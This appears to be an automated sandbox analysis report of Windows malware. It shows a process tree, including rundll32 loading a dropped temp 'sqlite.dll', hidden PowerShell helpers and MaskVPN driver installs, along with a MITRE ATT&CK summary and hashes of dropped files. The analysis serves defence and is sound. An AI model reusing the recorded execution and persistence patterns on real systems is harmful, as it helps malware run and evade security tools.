                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --mojo-platform-channel-handle=2804 /prefetch:8
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:9644
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_6087.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:8384
                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  PID:2292
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5968
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                    PID:9160
                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2d09f5eb-c05a-3d4d-9e2c-42786f5e1575}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      PID:8996
                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000124"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                      PID:6724
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                    PID:9144
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:9028
                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                      PID:9004
                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                      PID:8784
                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                      PID:8204
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        PID:9076
                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      PID:7236
                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                        MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:6816
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:4292
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        PID:7948
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:9040
                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                        PID:1936
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:8276
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        PID:6080
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:7552
                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                          PID:8036
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:8520
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6796
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:9564
                                                                                                                                                                                                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                C:\Windows\system32\AUDIODG.EXE 0x41c
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:9928
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:9932
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:9872
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:5108
                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:3368
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:1472
                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:7704
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:7260
                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:616
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:3500
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6580
                                                                                                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x43c
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:8348
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4200
                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:64
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:5728
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:8924

                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                              Software Discovery

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1518

                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                              7
                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                              7
                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1018

                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                e9d4dddb44c0e3ae70b2d66c598eb966

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5737666cbfd125abca562fca9d338032995abe30

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                4ae4d54b1e5338eaf79ed49399503937756b04a1011efbb121f29dc812e68786

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                b029b330b9fc702ecacbbca9df6a35685e672a28dd44002613c22bc0f7b991082967d3784fe10e198ace0cc64c5126ab2b321191cfef2821e4db132372fde8a8

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                246d3ae006f90127d0f28b6aa6dd8ac3

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                0e7c18a081e467a6b63887a7c8c8d72e481b6474

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                e5dc3e95c8121414808f05b8ac47938dc12dc9b7155c221519c1b867e914a09c

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                1a55abc7215103596ce7506c4d0ae9127e408b2d74f754b9fa23f6ff1d0a2393a465613e5e8509b3d3b5516a84b7c4bae58ad7b1bab465ac2edd4246598fcaef

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                8efc164bab9c65d8ff12c6d4b6f6381b

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                fc1a0938f2f8ccee6d53b0d89ebaf45e20c944c4

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                d2feb9c0be25a5e9985f646dac2ebe0514dc370baea360e590e04587461d3ade

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                325e28f1ebe56bb08571e48e7f37a6f79357dd89bff0c9093b1d351ed0a00d2019f3bb6c01356b3668b9697e544c689c14b35ce7b38516a52960972694d3df89

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                4c5fd5ee42c3e088368317651816063e

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                59d6cc97b8584de5b2a4322e53c8385f92ed8c3c

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                e1450f87b1180863c9f3ae0c3af28589e1a1041fc773fefe035ed99a76ac128f

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                1efcc73dd3ac6415b9916753dded19cd6386f7efeeae9de04de6a8e18ff94e48c55352e2a6cc3eec613c8cc4482776b1fea7a82460b8d4de872cd5f26610adbf

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                cb523c07cbf2c882ae6cb657c671bdfc

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                f58b1173363e8115c5eabf933218e98cabc10ec7

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8daddec32c08be43dc77a4840e8c9588be14c6c89255e0d0f8a0e360595febf0

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                b6a506d5614e335f5e65d64931e6baf68b32f0dc1467e58b610a0f7a808b4806f2356cad408dbcddd635e12d64fe791e18dc5e255d1277bb6a51ee92538cff64

